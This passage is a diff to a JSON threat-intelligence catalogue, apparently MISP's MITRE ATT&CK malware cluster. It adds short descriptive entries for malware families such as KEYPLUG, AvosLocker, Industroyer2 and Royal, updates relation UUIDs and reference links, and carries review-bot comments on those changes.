@@ -25824,13 +26621,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "326af1cd-78e7-45b7-a326-125d2f7ef8f2",
@@ -25852,6 +26642,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"tags": [
@@ -25912,6 +26709,84 @@
"uuid": "47124daf-44be-4530-9c63-038bc64318dd",
"value": "RegDuke - S0511"
},
+ {
+ "description": "[KEYPLUG](https://attack.mitre.org/software/S1051) is a modular backdoor written in C++, with Windows and Linux variants, that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least June 2021.(Citation: Mandiant APT41)",
+ "meta": {
+ "external_id": "S1051",
+ "mitre_platforms": [
+ "Linux",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1051",
+ "https://www.mandiant.com/resources/apt41-us-state-governments"
+ ],
+ "synonyms": [
+ "KEYPLUG",
+ "KEYPLUG.LINUX"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "6c575670-d14c-4c7f-9b9d-fd1b363e255d",
+ "value": "KEYPLUG - S1051"
+ },
{
"description": "[Milan](https://attack.mitre.org/software/S1015) is a backdoor implant based on [DanBot](https://attack.mitre.org/software/S1014) that was written in Visual C++ and .NET. [Milan](https://attack.mitre.org/software/S1015) has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)",
"meta": {
@@ -26075,6 +26950,180 @@
"uuid": "aea6d6b8-d832-4c90-a1bb-f52c6684db6c",
"value": "Milan - S1015"
},
+ {
+ "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) is mobile malware that was first seen in Google Play and other third-party stores in October 2021. It was discovered in 19 Android applications, of which at least 7 abused known Android exploits for obtaining root permissions. [AbstractEmu](https://attack.mitre.org/software/S1061) was observed primarily impacting users in the United States, however victims are believed to be across a total of 17 countries.(Citation: lookout_abstractemu_1021)",
+ "meta": {
+ "external_id": "S1061",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1061",
+ "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign"
+ ],
+ "synonyms": [
+ "AbstractEmu"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1d1b1558-c833-482e-aabb-d07ef6eae63d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2282a98b-5049-4f61-9381-55baca7c1add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "27d18e87-8f32-4be1-b456-39b90454360f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2aa78dfd-cb6f-4c70-9408-137cfd96be49",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2bb20118-e6c0-41dc-a07c-283ea4dd0fb8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32063d7f-0a39-440d-a4a3-2694488f96cc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "39dd7871-f59b-495f-a9a5-3cb8cc50c9b2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "693cdbff-ea73-49c6-ac3f-91e7285c31d1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6ffad4be-bfe0-424f-abde-4d9a84a800ad",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9c049d7b-c92a-4733-9381-27e2bd2ccadc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d8940e76-f9c1-4912-bea6-e21c251370b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e1c912a9-e305-434b-9172-8a6ce3ec9c4a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "2aec175b-4429-4048-8e09-3ef6cbecfc64",
+ "value": "AbstractEmu - S1061"
+ },
{
"description": "[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)",
"meta": {
@@ -26936,13 +27985,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
"tags": [
@@ -27143,6 +28185,34 @@
"uuid": "89c3dbf6-f281-41b7-be1d-a0e641014853",
"value": "Concipit1248 - S0426"
},
+ {
+ "description": "[Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)",
+ "meta": {
+ "external_id": "S1072",
+ "mitre_platforms": [
+ "Field Controller/RTU/PLC/IED",
+ "Engineering Workstation"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1072",
+ "https://www.youtube.com/watch?v=xC9iM5wVedQ"
+ ],
+ "synonyms": [
+ "Industroyer2"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5",
+ "value": "Industroyer2 - S1072"
+ },
{
"description": "[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)",
"meta": {
@@ -27313,14 +28383,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -28487,7 +29557,7 @@
"refs": [
"https://attack.mitre.org/software/S0412",
"https://blogs.cisco.com/security/talos/opening-zxshell",
- "https://content.fireeye.com/apt-41/rpt-apt41"
+ "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf"
],
"synonyms": [
"ZxShell",
@@ -28670,13 +29740,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -28799,6 +29862,119 @@
"uuid": "3c02fb1f-cbdb-48f5-abaf-8c81d6e0c322",
"value": "KARAE - S0215"
},
+ {
+ "description": "[DEADEYE](https://attack.mitre.org/software/S1052) is a malware launcher that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least May 2021. [DEADEYE](https://attack.mitre.org/software/S1052) has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).(Citation: Mandiant APT41)",
+ "meta": {
+ "external_id": "S1052",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1052",
+ "https://www.mandiant.com/resources/apt41-us-state-governments"
+ ],
+ "synonyms": [
+ "DEADEYE",
+ "DEADEYE.EMBED",
+ "DEADEYE.APPEND"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "853c4192-4311-43e1-bfbb-b11b14911852",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "c46eb8e6-bf29-4696-8008-3ddb0b4ca470",
+ "value": "DEADEYE - S1052"
+ },
{
"description": "[Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)",
"meta": {
@@ -29115,7 +30291,7 @@
],
"refs": [
"https://attack.mitre.org/software/S0152",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf"
],
"synonyms": [
"EvilGrab"
@@ -29236,6 +30412,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "215d9700-5881-48b8-8265-6449dbb7195d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e",
"tags": [
@@ -29264,13 +30447,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
"tags": [
@@ -29348,13 +30524,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
"tags": [
@@ -29404,13 +30573,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b",
"tags": [
@@ -29598,13 +30760,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -29660,13 +30815,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "a4f57468-fbd5-49e4-8476-52088220b92d",
@@ -29697,6 +30845,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1",
"tags": [
@@ -29802,6 +30957,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8",
"tags": [
@@ -30755,13 +31917,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "65341f30-bec6-4b1d-8abf-1a5620446c29",
@@ -32201,6 +33356,134 @@
"uuid": "a2282af0-f9dd-4373-9b92-eaf9e11e0c71",
"value": "Final1stspy - S0355"
},
+ {
+ "description": "[AvosLocker](https://attack.mitre.org/software/S1053) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://attack.mitre.org/software/S1053) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Joint CSA AvosLocker Mar 2022)",
+ "meta": {
+ "external_id": "S1053",
+ "mitre_platforms": [
+ "Linux",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1053",
+ "https://www.ic3.gov/Media/News/2022/220318.pdf",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker"
+ ],
+ "synonyms": [
+ "AvosLocker"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "28170e17-8384-415c-8486-2e6b294cb803",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ea4c2f9c-9df1-477c-8c42-6da1118f2ac4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "0945a1a5-a79a-47c8-9079-10c16cdfcb5d",
+ "value": "AvosLocker - S1053"
+ },
{
"description": "[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)",
"meta": {
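Review bot: the new AvosLocker cluster's `uuid` (`0945a1a5-...`) should be the `malware--` STIX id of S1053 from the upstream ATT&CK bundle rather than a locally generated one, or the next regeneration will create a second AvosLocker entry instead of updating this one; also verify that all 15 dest-uuids in `related` resolve in the attack-pattern cluster. The `related` list is sorted by dest-uuid and `refs` alphabetically, consistent with the neighbouring entries.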
@@ -32274,13 +33557,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -32497,6 +33773,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -32799,7 +34082,7 @@
"https://attack.mitre.org/software/S0153",
"https://twitter.com/ItsReallyNick/status/850105140589633536",
"https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf"
],
"synonyms": [
"RedLeaves",
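Review bot: the PwC reference is replaced with a new live URL (`pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf`) and nothing else; since the previous `cloud-hopper-annex-b-final.pdf` path has already rotted once, consider recording a web.archive.org snapshot alongside it, as is done for the FireEye APT28 report elsewhere in this patch, so the citation survives the next site reorganisation. The same swap appears again in the hunk at `-34631`, so whatever is decided should be applied to both.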
@@ -32919,13 +34202,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -32953,13 +34229,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
@@ -33116,6 +34385,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -33487,7 +34763,7 @@
"refs": [
"https://attack.mitre.org/software/S0137",
"https://securelist.com/a-slice-of-2017-sofacy-activity/83930/",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
+ "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
"https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf"
],
"synonyms": [
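Review bot: swapping the dead FireEye `rpt-apt28.pdf` link for a timestamped Wayback capture (`20151022204649`) is the right fix, but please confirm that this capture actually serves the PDF and is not a redirect-only snapshot; the adjacent `www2.fireeye.com/rs/848-DID-242/.../APT28-Center-of-Storm-2017.pdf` ref is on the same vendor host and is a candidate for the same treatment in this PR rather than a follow-up.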
@@ -33702,6 +34978,121 @@
"uuid": "f9854ba6-989d-43bf-828b-7240b8a65291",
"value": "Marcher - S0317"
},
+ {
+ "description": "[Royal](https://attack.mitre.org/software/S1073) is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. [Royal](https://attack.mitre.org/software/S1073) employs partial encryption and multiple threads to evade detection and speed encryption. [Royal](https://attack.mitre.org/software/S1073) has been used in attacks against multiple industries worldwide--including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in [Royal](https://attack.mitre.org/software/S1073) and [Conti](https://attack.mitre.org/software/S0575) attacks and noted a possible connection between their operators.(Citation: Microsoft Royal ransomware November 2022)(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: Trend Micro Royal Linux ESXi February 2023)(Citation: CISA Royal AA23-061A March 2023)",
+ "meta": {
+ "external_id": "S1073",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1073",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a",
+ "https://www.cybereason.com/blog/royal-ransomware-analysis",
+ "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive",
+ "https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/",
+ "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html"
+ ],
+ "synonyms": [
+ "Royal"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
